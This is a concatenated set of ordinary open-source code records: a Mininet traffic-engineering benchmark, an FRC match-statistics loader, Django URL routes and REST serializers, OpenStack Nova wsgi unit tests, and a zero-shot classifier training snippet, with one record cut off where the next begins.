f.write(dat[ID])\n else:\n f.write(\"0,0,0,0\")\n\n f.write(\"\\n\")\n\n # Generate the gnuplot script used to make the graphs\n num_series = len(SCENARIO[\"scenario\"][\"send\"])\n margin = 5\n if num_series > 3:\n margin += 1\n\n with open(\"out_%s.p\" % server_index, \"w\") as f:\n out_file = \"graph_%s.png\" % server_index\n data_fname = \"out_%s.dat\" % server_index\n f.write(GNUPLOT_SCRIPT_TMPL % (out_file, margin))\n\n for i in range(num_series):\n series = \"1:%s\" % (6+4*i)\n series_name = \"Stream %s\" % (i+1)\n f.write(GNUPLOT_SERIES_TMPL % (data_fname, series, series_name))\n\n if not i == (num_series - 1):\n f.write(\", \\\\\\n\")\n else:\n f.write(\"\\n\")\n\n # Create graph of data and print detected congestion start and end times for each stream\n cmd = \"gnuplot out_%s.p\" % server_index\n subprocess.call(cmd.split(\" \"))\n for ID in stream_id:\n print(\"%s,%s,%s\" % (ID, stream_congestion[ID][\"start\"],\n stream_congestion[ID][\"end\"]))\n\n\nif __name__ == \"__main__\":\n # Load the controller config and retrieve the script arguments\n CONTROLLERS = load_ctrls(\"controllers_te.yaml\")\n parser = ArgumentParser(\"Mininet Emulator: Iperf TE benchmark\")\n parser.add_argument(\"--topo\", required=True, type=str,\n help=\"Topology module to use for emulation\")\n parser.add_argument(\"--controller\", required=True, type=str,\n help=\"Controller to use for emulation (%s)\"\n % get_ctrl_names(CONTROLLERS))\n parser.add_argument(\"--scenario\", required=True, type=str,\n help=\"TE scenario YAML file\")\n parser.add_argument(\"--sw_ctrl_map\", type=str, default=None,\n help=\"Switch-controller JSON map file (use multiple controllers)\")\n parser.add_argument(\"--ctrl_options\", type=str, default=None,\n help=\"netem options to apply to control channel (i.e. 
delay 10ms)\")\n    parser.add_argument(\"--log_level\", type=str, default=\"critical\",\n                        help=\"Emulator log level (debug, info, warning, error, critical)\")\n    parser.add_argument(\"--ctrl_log_level\", type=str, default=\"critical\",\n                        help=\"Controller log level (debug, info, warning, error, critical)\")\n    parser.add_argument(\"--config_file\", type=str,\n                        default=\"EmulatorConfigs/config.TE.yaml\",\n                        help=\"Framework config file (specify start cmd and config attr)\")\n    args = parser.parse_args()\n\n    # Load the topology module, TE scenario and validate attributes/run\n    topoMod = path_to_import_notation(args.topo)\n    topo = importlib.import_module(topoMod)\n    topo = topo.NetTopo()\n\n    controller_name = args.controller.lower()\n    if controller_name not in CONTROLLERS:\n        lg.critical(\"Invalid controller name received!\\n\")\n        exit()\n\n    SCENARIO = load_scenario(args.scenario)\n    if \"usable_on_topo\" in SCENARIO:\n        if topo.name not in SCENARIO[\"usable_on_topo\"]:\n            exit()\n    validate_scenario(SCENARIO, controller_name, topo)\n\n    ctrl_channel_options = None\n    if args.ctrl_options:\n        ctrl_channel_options = args.ctrl_options.lower()\n\n    sw_ctrl_map = None\n    if args.sw_ctrl_map is not None and os.path.isfile(args.sw_ctrl_map):\n        sw_ctrl_map = args.sw_ctrl_map\n\n    # Check if there are any running instances of mininet, or the controller\n    running_instance_check()\n    setLogLevel(args.log_level)\n    try:\n        # Apply ports data to controllers if scenario specifies field\n        ports_data = None\n        if \"port_desc\" in SCENARIO:\n            info(\"Port desc found in scenario, applying to controllers\\n\")\n            ports_data = SCENARIO[\"port_desc\"]\n\n        # Initiate controller manager, configure controllers and run experiment\n        controllers = ControllerManager(ports_data=ports_data,\n                            map=sw_ctrl_map,\n                            ctrl_channel_opts=ctrl_channel_options,\n                            log_level=args.ctrl_log_level,\n                            config_file=args.config_file)\n\n        # If TE config defined in scenario, overwrite default attribute values\n        interval = 1\n        threshold = 0.90\n        consolidate_time = 1\n        if \"te_conf\" in SCENARIO:\n            if \"interval\" in SCENARIO[\"te_conf\"]:\n                interval = SCENARIO[\"te_conf\"][\"interval\"]\n            if \"threshold\" in SCENARIO[\"te_conf\"]:\n                threshold = SCENARIO[\"te_conf\"][\"threshold\"]\n            if \"consolidate_time\" in SCENARIO[\"te_conf\"]:\n                consolidate_time = SCENARIO[\"te_conf\"][\"consolidate_time\"]\n\n        # Set controller configuration attributes\n        controllers.set_ctrl_config(\"stats\", \"interval\", interval)\n        controllers.set_ctrl_config(\"te\", \"utilisation_threshold\", threshold)\n        controllers.set_ctrl_config(\"te\", \"consolidate_time\", consolidate_time)\n        controllers.set_ctrl_cmd_module(get_ctrl_module(CONTROLLERS,\n                                            controller_name))\n        net = controllers.start(topo)\n        run(controller_name)\n    except:\n        # Show the error, clean up and exit the app\n        print(\"ERROR!,Exception occurred while running emulation\")\n        lg.critical(\"%s\\n\" % traceback.format_exc())\n        cleanup()\n","repo_name":"wandsdn/helix","sub_path":"EmulateTE.py","file_name":"EmulateTE.py","file_ext":"py","file_size_in_byte":22435,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"18336854227","text":"import datetime\nimport statistics\n\nfrom classes import Match\nimport read_tba\nimport utils\n\n\ndef getEvents(year):\n    events = []\n    for event in read_tba.get(\"events/\"+str(year)+\"/simple\"):\n        if(event[\"event_type\"] <= 10):\n            events.append(event[\"key\"])\n    return events\n\n\ndef getTeams(event):\n    return 
read_tba.get(\"event/\"+str(event)+\"/teams/keys\")\n\n\ndef getEventTime(event):\n # for pre 2016 events\n date = read_tba.get(\"event/\"+str(event)+\"/simple\")[\"start_date\"]\n return int(datetime.datetime.strptime(date, \"%Y-%m-%d\").timestamp())\n\n\ndef getMatchTime(match, event_time):\n if match[\"actual_time\"] is not None:\n return match[\"actual_time\"]\n\n match_time = event_time # start value\n if match[\"comp_level\"] == \"qm\":\n match_time += match[\"match_number\"]\n elif match[\"comp_level\"] == \"qf\":\n match_time += 200 + 10 * match[\"set_number\"] + match[\"match_number\"]\n elif match[\"comp_level\"] == \"sf\":\n match_time += 400 + 10 * match[\"set_number\"] + match[\"match_number\"]\n else:\n match_time += 600 + match[\"match_number\"]\n\n return match_time\n\n\ndef getMatchesEvent(year, event):\n matches = []\n event_time = getEventTime(event)\n for match in read_tba.get(\"event/\"+str(event)+\"/matches/simple\"):\n # correctly orders matches pre 2016\n match[\"actual_time\"] = getMatchTime(match, event_time)\n red_teams = len(match[\"alliances\"][\"red\"][\"team_keys\"])\n blue_teams = len(match[\"alliances\"][\"blue\"][\"team_keys\"])\n\n if(year > 2004 and red_teams == 3 and blue_teams == 3):\n matches.append(Match(match))\n elif(year <= 2004 and red_teams >= 2 and blue_teams >= 2):\n matches.append(Match(match))\n\n matches.sort()\n return matches\n\n\ndef getMatchesYear(year):\n matches = []\n events = getEvents(year)\n for event in events:\n for match in getMatchesEvent(year, event):\n matches.append(match)\n matches.sort()\n return matches\n\n\ndef saveMatches(start_year, end_year):\n for year in range(start_year, end_year+1):\n print(year)\n matches = getMatchesYear(year)\n utils.saveMatches(year, matches)\n\n\ndef getSD(year):\n scores = []\n for match in getMatchesYear(year):\n print(year)\n scores.append(match.red_score)\n scores.append(match.blue_score)\n return statistics.pstdev(scores)\n\n\ndef getSDs(start_year, end_year):\n for year in range(start_year, end_year+1):\n print(str(year)+\":\\t\"+str(getSD(year)))\n\n\ndef main():\n # getSDs(2002, 2020)\n saveMatches(2002, 2020)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"poofyjacket/statbotics","sub_path":"statbotics_elo/calculate/load_matches.py","file_name":"load_matches.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"19890630440","text":"from django.urls import path, re_path\nfrom . 
import views\n# View the restaurant list\n# View restaurant details, e.g. /myrestaurants/restaurant/1/\n# Create a restaurant, e.g.: /myrestaurants/restaurant/create/\n# Edit restaurant details, e.g.: /myrestaurants/restaurant/1/edit/\n# URLs for the first 4 functional pages are covered in part one of the tutorial\n# Create a dish ex.: /myrestaurants/restaurant/1/dishes/create/\n# Edit a dish, ex.: /myrestaurants/restaurant/1/dishes/1/edit/\n# View dish info ex: /myrestaurants/restaurants/1/dishes/1/\n# Create a restaurant review, /myrestaurants/restaurant/1/reviews/create/\n# namespace\napp_name = 'rest'\nurlpatterns = [\n    re_path(r'^rest/$', views.RestaurantList.as_view(), name='restaurant_list'),\n    re_path(r'^rest/list/$', views.res_list, name='res_list'),\n    re_path(r'^rest/createreview/$', views.rest_review, name='createreview'),\n    re_path(r'^rest/(?P\d+)/create_review/$', views.rest_review, name='create_review'),\n    re_path(r'^rest/(?P\d+)/$',views.RestaurantDetail.as_view(), name='restaurant_detail'),\n    re_path(r'^rest/create/$', views.RestaurantCreate.as_view(), name='restaurant_create'),\n    re_path(r'^rest/(?P\d+)/edit/$',views.RestaurantEdit.as_view(), name='restaurant_edit'),\n    re_path(r'^rest/(?P\d+)/dishes/create/$',views.DishCreate.as_view(), name='dish_create'),\n    re_path(r'^rest/(?P\d+)/dishes/(?P\d+)/edit/$',views.DishEdit.as_view(), name='dish_edit'),\n    re_path(r'^rest/(?P\d+)/dishes/(?P\d+)/$',views.DishDetail.as_view(), name='dish_detail'),\n    re_path(r'^rest/(?P\d+)/reviews/create/$',views.review_create, name='review_create'),\n    re_path(r'^rest/deliver_review/$', views.deliver_review, name='deliver_review'),\n\n]\n\n\n","repo_name":"LiuWenJingI/GraduationDesign","sub_path":"guan/rest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28563470267","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport inspect\n\nimport mock\nimport six\nimport webob\n\nfrom nova.api.openstack import api_version_request as api_version\nfrom nova.api.openstack import extensions\nfrom nova.api.openstack import wsgi\nfrom nova import exception\nfrom nova import i18n\nfrom nova import test\nfrom nova.tests.unit.api.openstack import fakes\nfrom nova.tests.unit import matchers\nfrom nova.tests.unit import utils\nfrom oslo_serialization import jsonutils\n\n\nclass RequestTest(test.NoDBTestCase):\n    header_name = 'X-OpenStack-Nova-API-Version'\n\n    def test_content_type_missing(self):\n        request = wsgi.Request.blank('/tests/123', method='POST')\n        request.body = b\"\"\n        self.assertIsNone(request.get_content_type())\n\n    def test_content_type_unsupported(self):\n        request = wsgi.Request.blank('/tests/123', method='POST')\n        request.headers[\"Content-Type\"] = \"text/html\"\n        request.body = b\"asdf
\"\n self.assertRaises(exception.InvalidContentType,\n request.get_content_type)\n\n def test_content_type_with_charset(self):\n request = wsgi.Request.blank('/tests/123')\n request.headers[\"Content-Type\"] = \"application/json; charset=UTF-8\"\n result = request.get_content_type()\n self.assertEqual(result, \"application/json\")\n\n def test_content_type_accept_default(self):\n request = wsgi.Request.blank('/tests/123.unsupported')\n request.headers[\"Accept\"] = \"application/unsupported1\"\n result = request.best_match_content_type()\n self.assertEqual(result, \"application/json\")\n\n def test_cache_and_retrieve_instances(self):\n request = wsgi.Request.blank('/foo')\n instances = []\n for x in range(3):\n instances.append({'uuid': 'uuid%s' % x})\n # Store 2\n request.cache_db_instances(instances[:2])\n # Store 1\n request.cache_db_instance(instances[2])\n self.assertEqual(request.get_db_instance('uuid0'),\n instances[0])\n self.assertEqual(request.get_db_instance('uuid1'),\n instances[1])\n self.assertEqual(request.get_db_instance('uuid2'),\n instances[2])\n self.assertIsNone(request.get_db_instance('uuid3'))\n self.assertEqual(request.get_db_instances(),\n {'uuid0': instances[0],\n 'uuid1': instances[1],\n 'uuid2': instances[2]})\n\n def test_cache_and_retrieve_compute_nodes(self):\n request = wsgi.Request.blank('/foo')\n compute_nodes = []\n for x in range(3):\n compute_nodes.append({'id': 'id%s' % x})\n # Store 2\n request.cache_db_compute_nodes(compute_nodes[:2])\n # Store 1\n request.cache_db_compute_node(compute_nodes[2])\n self.assertEqual(request.get_db_compute_node('id0'),\n compute_nodes[0])\n self.assertEqual(request.get_db_compute_node('id1'),\n compute_nodes[1])\n self.assertEqual(request.get_db_compute_node('id2'),\n compute_nodes[2])\n self.assertIsNone(request.get_db_compute_node('id3'))\n self.assertEqual(request.get_db_compute_nodes(),\n {'id0': compute_nodes[0],\n 'id1': compute_nodes[1],\n 'id2': compute_nodes[2]})\n\n def test_from_request(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'bogus;q=1.1, en-gb;q=0.7,en-us,en;q=.5,*;q=.7'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'en_US')\n\n def test_asterisk(self):\n # asterisk should match first available if there\n # are not any other available matches\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = '*,es;q=.5'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'en_GB')\n\n def test_prefix(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'zh'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'zh_CN')\n\n def test_secondary(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'nn,en-gb;q=.5'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'en_GB')\n\n def test_none_found(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'nb-no'\n request.headers = {'Accept-Language': accepted}\n self.assertIs(request.best_match_language(), None)\n\n def 
test_no_lang_header(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = ''\n request.headers = {'Accept-Language': accepted}\n self.assertIs(request.best_match_language(), None)\n\n def test_api_version_request_header_none(self):\n request = wsgi.Request.blank('/')\n request.set_api_version_request()\n self.assertEqual(api_version.APIVersionRequest(\n api_version.DEFAULT_API_VERSION), request.api_version_request)\n\n @mock.patch(\"nova.api.openstack.api_version_request.max_api_version\")\n def test_api_version_request_header(self, mock_maxver):\n mock_maxver.return_value = api_version.APIVersionRequest(\"2.14\")\n\n request = wsgi.Request.blank('/')\n request.headers = {self.header_name: '2.14'}\n request.set_api_version_request()\n self.assertEqual(api_version.APIVersionRequest(\"2.14\"),\n request.api_version_request)\n\n @mock.patch(\"nova.api.openstack.api_version_request.max_api_version\")\n def test_api_version_request_header_latest(self, mock_maxver):\n mock_maxver.return_value = api_version.APIVersionRequest(\"3.5\")\n\n request = wsgi.Request.blank('/')\n request.headers = {self.header_name: 'latest'}\n request.set_api_version_request()\n self.assertEqual(api_version.APIVersionRequest(\"3.5\"),\n request.api_version_request)\n\n def test_api_version_request_header_invalid(self):\n request = wsgi.Request.blank('/')\n request.headers = {self.header_name: '2.1.3'}\n\n self.assertRaises(exception.InvalidAPIVersionString,\n request.set_api_version_request)\n\n\nclass ActionDispatcherTest(test.NoDBTestCase):\n def test_dispatch(self):\n serializer = wsgi.ActionDispatcher()\n serializer.create = lambda x: 'pants'\n self.assertEqual(serializer.dispatch({}, action='create'), 'pants')\n\n def test_dispatch_action_None(self):\n serializer = wsgi.ActionDispatcher()\n serializer.create = lambda x: 'pants'\n serializer.default = lambda x: 'trousers'\n self.assertEqual(serializer.dispatch({}, action=None), 'trousers')\n\n def test_dispatch_default(self):\n serializer = wsgi.ActionDispatcher()\n serializer.create = lambda x: 'pants'\n serializer.default = lambda x: 'trousers'\n self.assertEqual(serializer.dispatch({}, action='update'), 'trousers')\n\n\nclass JSONDictSerializerTest(test.NoDBTestCase):\n def test_json(self):\n input_dict = dict(servers=dict(a=(2, 3)))\n expected_json = '{\"servers\":{\"a\":[2,3]}}'\n serializer = wsgi.JSONDictSerializer()\n result = serializer.serialize(input_dict)\n result = result.replace('\\n', '').replace(' ', '')\n self.assertEqual(result, expected_json)\n\n\nclass JSONDeserializerTest(test.NoDBTestCase):\n def test_json(self):\n data = \"\"\"{\"a\": {\n \"a1\": \"1\",\n \"a2\": \"2\",\n \"bs\": [\"1\", \"2\", \"3\", {\"c\": {\"c1\": \"1\"}}],\n \"d\": {\"e\": \"1\"},\n \"f\": \"1\"}}\"\"\"\n as_dict = {\n 'body': {\n 'a': {\n 'a1': '1',\n 'a2': '2',\n 'bs': ['1', '2', '3', {'c': {'c1': '1'}}],\n 'd': {'e': '1'},\n 'f': '1',\n },\n },\n }\n deserializer = wsgi.JSONDeserializer()\n self.assertEqual(deserializer.deserialize(data), as_dict)\n\n def test_json_valid_utf8(self):\n data = b\"\"\"{\"server\": {\"min_count\": 1, \"flavorRef\": \"1\",\n \"name\": \"\\xe6\\xa6\\x82\\xe5\\xbf\\xb5\",\n \"imageRef\": \"10bab10c-1304-47d\",\n \"max_count\": 1}} \"\"\"\n as_dict = {\n 'body': {\n u'server': {\n u'min_count': 1, u'flavorRef': u'1',\n u'name': u'\\u6982\\u5ff5',\n u'imageRef': u'10bab10c-1304-47d',\n u'max_count': 1\n }\n }\n }\n deserializer = 
wsgi.JSONDeserializer()\n self.assertEqual(deserializer.deserialize(data), as_dict)\n\n def test_json_invalid_utf8(self):\n \"\"\"Send invalid utf-8 to JSONDeserializer.\"\"\"\n data = b\"\"\"{\"server\": {\"min_count\": 1, \"flavorRef\": \"1\",\n \"name\": \"\\xf0\\x28\\x8c\\x28\",\n \"imageRef\": \"10bab10c-1304-47d\",\n \"max_count\": 1}} \"\"\"\n\n deserializer = wsgi.JSONDeserializer()\n self.assertRaises(exception.MalformedRequestBody,\n deserializer.deserialize, data)\n\n\nclass ResourceTest(test.NoDBTestCase):\n header_name = 'X-OpenStack-Nova-API-Version'\n\n def get_req_id_header_name(self, request):\n header_name = 'x-openstack-request-id'\n if utils.get_api_version(request) < 3:\n header_name = 'x-compute-request-id'\n\n return header_name\n\n def test_resource_receives_api_version_request_default(self):\n class Controller(object):\n def index(self, req):\n if req.api_version_request != \\\n api_version.APIVersionRequest(\n api_version.DEFAULT_API_VERSION):\n raise webob.exc.HTTPInternalServerError()\n return 'success'\n\n app = fakes.TestRouterV21(Controller())\n req = webob.Request.blank('/tests')\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n\n @mock.patch(\"nova.api.openstack.api_version_request.max_api_version\")\n def test_resource_receives_api_version_request(self, mock_maxver):\n version = \"2.5\"\n mock_maxver.return_value = api_version.APIVersionRequest(version)\n\n class Controller(object):\n def index(self, req):\n if req.api_version_request != \\\n api_version.APIVersionRequest(version):\n raise webob.exc.HTTPInternalServerError()\n return 'success'\n\n app = fakes.TestRouterV21(Controller())\n req = webob.Request.blank('/tests')\n req.headers = {self.header_name: version}\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n\n def test_resource_receives_api_version_request_invalid(self):\n invalid_version = \"2.5.3\"\n\n class Controller(object):\n def index(self, req):\n return 'success'\n\n app = fakes.TestRouterV21(Controller())\n req = webob.Request.blank('/tests')\n req.headers = {self.header_name: invalid_version}\n response = req.get_response(app)\n self.assertEqual(400, response.status_int)\n\n def test_resource_call_with_method_get(self):\n class Controller(object):\n def index(self, req):\n return 'success'\n\n app = fakes.TestRouter(Controller())\n # the default method is GET\n req = webob.Request.blank('/tests')\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n req.content_type = 'application/json'\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n\n def test_resource_call_with_method_post(self):\n class Controller(object):\n @extensions.expected_errors(400)\n def create(self, req, body):\n if expected_body != body:\n msg = \"The request body invalid\"\n raise webob.exc.HTTPBadRequest(explanation=msg)\n return \"success\"\n # verify the method: POST\n app = fakes.TestRouter(Controller())\n req = webob.Request.blank('/tests', method=\"POST\",\n content_type='application/json')\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n expected_body = {'body': {\n \"key\": \"value\"\n 
}\n }\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n # verify without body\n expected_body = None\n req.body = None\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n # the body is validated in the controller\n expected_body = {'body': None}\n response = req.get_response(app)\n expected_unsupported_type_body = {'badRequest':\n {'message': 'The request body invalid', 'code': 400}}\n self.assertEqual(response.status_int, 400)\n self.assertEqual(expected_unsupported_type_body,\n jsonutils.loads(response.body))\n\n def test_resource_call_with_method_put(self):\n class Controller(object):\n def update(self, req, id, body):\n if expected_body != body:\n msg = \"The request body invalid\"\n raise webob.exc.HTTPBadRequest(explanation=msg)\n return \"success\"\n # verify the method: PUT\n app = fakes.TestRouter(Controller())\n req = webob.Request.blank('/tests/test_id', method=\"PUT\",\n content_type='application/json')\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n expected_body = {'body': {\n \"key\": \"value\"\n }\n }\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n req.body = None\n expected_body = None\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n # verify no content_type is contained in the request\n req = webob.Request.blank('/tests/test_id', method=\"PUT\",\n content_type='application/xml')\n req.content_type = 'application/xml'\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n response = req.get_response(app)\n expected_unsupported_type_body = {'badRequest':\n {'message': 'Unsupported Content-Type', 'code': 400}}\n self.assertEqual(response.status_int, 400)\n self.assertEqual(expected_unsupported_type_body,\n jsonutils.loads(response.body))\n\n def test_resource_call_with_method_delete(self):\n class Controller(object):\n def delete(self, req, id):\n return \"success\"\n\n # verify the method: DELETE\n app = fakes.TestRouter(Controller())\n req = webob.Request.blank('/tests/test_id', method=\"DELETE\")\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n # ignore the body\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n\n def test_resource_not_authorized(self):\n class Controller(object):\n def index(self, req):\n raise exception.Forbidden()\n\n req = webob.Request.blank('/tests')\n app = fakes.TestRouter(Controller())\n response = req.get_response(app)\n self.assertEqual(response.status_int, 403)\n\n def test_dispatch(self):\n class Controller(object):\n def index(self, req, pants=None):\n return pants\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n method, extensions = resource.get_method(None, 'index', None, '')\n actual = resource.dispatch(method, None, {'pants': 'off'})\n expected = 'off'\n self.assertEqual(actual, expected)\n\n def test_get_method_unknown_controller_method(self):\n class Controller(object):\n def index(self, req, pants=None):\n return pants\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n self.assertRaises(AttributeError, resource.get_method,\n None, 'create', None, '')\n\n def test_get_method_action_json(self):\n class Controller(wsgi.Controller):\n 
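# the wsgi.action decorator maps the JSON body key 'fooAction' to this handler\n            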
@wsgi.action('fooAction')\n def _action_foo(self, req, id, body):\n return body\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n method, extensions = resource.get_method(None, 'action',\n 'application/json',\n '{\"fooAction\": true}')\n self.assertEqual(controller._action_foo, method)\n\n def test_get_method_action_bad_body(self):\n class Controller(wsgi.Controller):\n @wsgi.action('fooAction')\n def _action_foo(self, req, id, body):\n return body\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n self.assertRaises(exception.MalformedRequestBody, resource.get_method,\n None, 'action', 'application/json', '{}')\n\n def test_get_method_unknown_controller_action(self):\n class Controller(wsgi.Controller):\n @wsgi.action('fooAction')\n def _action_foo(self, req, id, body):\n return body\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n self.assertRaises(KeyError, resource.get_method,\n None, 'action', 'application/json',\n '{\"barAction\": true}')\n\n def test_get_method_action_method(self):\n class Controller(object):\n def action(self, req, pants=None):\n return pants\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n method, extensions = resource.get_method(None, 'action',\n 'application/xml',\n 'true best_seen:\n print(f'New best validation seen class accuracy={acc_val_seen*100:.4f}% (train seen class accuracy={acc_train*100:.4f}%)')\n best_seen = acc_val_seen\n best_model = copy.deepcopy(self.model)\n else:\n best_model = torch.load(self.opt.rootpath + '/models/base-classifiers/' + self.opt.dataset + self.opt.image_embedding + f'_seed{self.seedinfo}_clr{self.opt.classifier_lr}_nep{self.nepoch}')\n\n return best_model\n \n def next_batch(self, batch_size):\n start = self.index_in_epoch\n # shuffle the data at the first epoch\n if self.epochs_completed == 0 and start == 0:\n perm = torch.randperm(self.ntrain)\n self.train_X = self.train_X[perm]\n self.train_Y = self.train_Y[perm]\n # the last batch\n if start + batch_size > self.ntrain:\n self.epochs_completed += 1\n rest_num_examples = self.ntrain - start\n if rest_num_examples > 0:\n X_rest_part = self.train_X[start:self.ntrain]\n Y_rest_part = self.train_Y[start:self.ntrain]\n # shuffle the data\n perm = torch.randperm(self.ntrain)\n self.train_X = self.train_X[perm]\n self.train_Y = self.train_Y[perm]\n # start next epoch\n start = 0\n self.index_in_epoch = batch_size - rest_num_examples\n end = self.index_in_epoch\n X_new_part = self.train_X[start:end]\n Y_new_part = self.train_Y[start:end]\n if rest_num_examples > 0:\n return torch.cat((X_rest_part, X_new_part), 0) , torch.cat((Y_rest_part, Y_new_part), 0)\n else:\n return X_new_part, Y_new_part\n else:\n self.index_in_epoch += batch_size\n end = self.index_in_epoch\n # from index start to index end-1\n return self.train_X[start:end], self.train_Y[start:end]\n","repo_name":"ExplainableML/ImageFreeZSL","sub_path":"utility/train_base.py","file_name":"train_base.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"29977942141","text":"from rest_framework import serializers\n\nfrom custom_auth.api.serializers import AddressSerializer\nfrom order.api.serializers import OrderHistorySerializer\nfrom product.api.serializers import ProductSerializer\nfrom warehouse.models import Vehicle, Driver, QCEntry, VehicleAssignment, Stock, StockInline, EggProductStockInline, \\\n Warehouse, WarehousePersonProfile, 
QCLine, Inventory, PackedInventory, DailyPaymentLine, DailyPayments, Expense, \\\n ExpenseRequest, ExpenseCategory, BankTransaction, BankDetails, BeatInventory, BeatInventoryLine, AdhocVehicle\n\nfrom warehouse.models.Wastage import Wastage\n\n\nclass VehicleSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehicle\n fields = '__all__'\n\nclass AdhocVehicleSerializer(serializers.ModelSerializer):\n class Meta:\n model = AdhocVehicle\n fields = '__all__'\n\n\nclass VehicleOnboardSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehicle\n fields = ('vehicle_desc', 'vehicle_no', 'vehicle_identifier', 'vehicle_photo_url', 'vendor',\n 'vendor_contact_no', 'per_day_charge', 'per_day_duration', 'per_day_distance', 'default_driver')\n\n\nclass DriverSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Driver\n fields = '__all__'\n\n\nclass InventorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Inventory\n fields = '__all__'\n\n\nclass PackedInventorySerializer(serializers.ModelSerializer):\n product = serializers.SerializerMethodField()\n\n def get_product(self, obj):\n return ProductSerializer(obj.product).data\n\n class Meta:\n model = PackedInventory\n fields = '__all__'\n\n\nclass BeatInventorySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BeatInventory\n fields = '__all__'\n\n\nclass BeatInventoryLineSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BeatInventoryLine\n fields = ('product', 'quantity')\n\n\nclass BeatInventoryHistorySerializer(serializers.ModelSerializer):\n inlines = serializers.SerializerMethodField()\n\n def get_inlines(self, obj):\n beatInventoryInlines = obj.beat_inventory_line.all()\n return BeatInventoryLineSerializer(beatInventoryInlines, many=True).data\n\n class Meta:\n model = BeatInventory\n fields = ('beat_details', 'date' , 'inventory_status', 'warehouse', 'inlines', 'entered_by')\n\n\nclass DriverOnboardSerializer(serializers.ModelSerializer):\n class Meta:\n model = Driver\n fields = ('driver_name', 'driver_desc', 'driver_no', 'driver_license_no', 'driver_photo', 'license_photo')\n\n\nclass DriverShortSerializer(serializers.ModelSerializer):\n class Meta:\n model = Driver\n fields = ('driver_name', 'driver_no','id')\n\nclass VehicleShortSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehicle\n fields = ('id', 'vehicle_no', 'vehicle_identifier_type', 'vendor', 'vehicle_status')\n\n\nclass AdhocVehicleShortSerializer(serializers.ModelSerializer):\n class Meta:\n model = AdhocVehicle\n fields = ('id', 'vehicle_no', 'vehicle_identifier_type', 'vendor', 'vehicle_status')\n\n\n\nclass VehicleAssignmentSendDeliverySerializer(serializers.ModelSerializer):\n order = serializers.SerializerMethodField()\n\n def get_order(self, obj):\n orderInlines = obj.order_set.all()\n return OrderHistorySerializer(orderInlines, many=True).data\n\n class Meta:\n model = VehicleAssignment\n fields = ('driver', 'vehicle', 'operation_option', 'desc', 'delivery_person', 'order')\n\n\nclass VehicleAssignmentSerializer(serializers.ModelSerializer):\n driver = DriverSerializer()\n vehicle = VehicleSerializer()\n order = serializers.SerializerMethodField()\n\n def get_order(self, obj):\n orderInlines = obj.order_set.all()\n return OrderHistorySerializer(orderInlines, many=True).data\n\n class Meta:\n 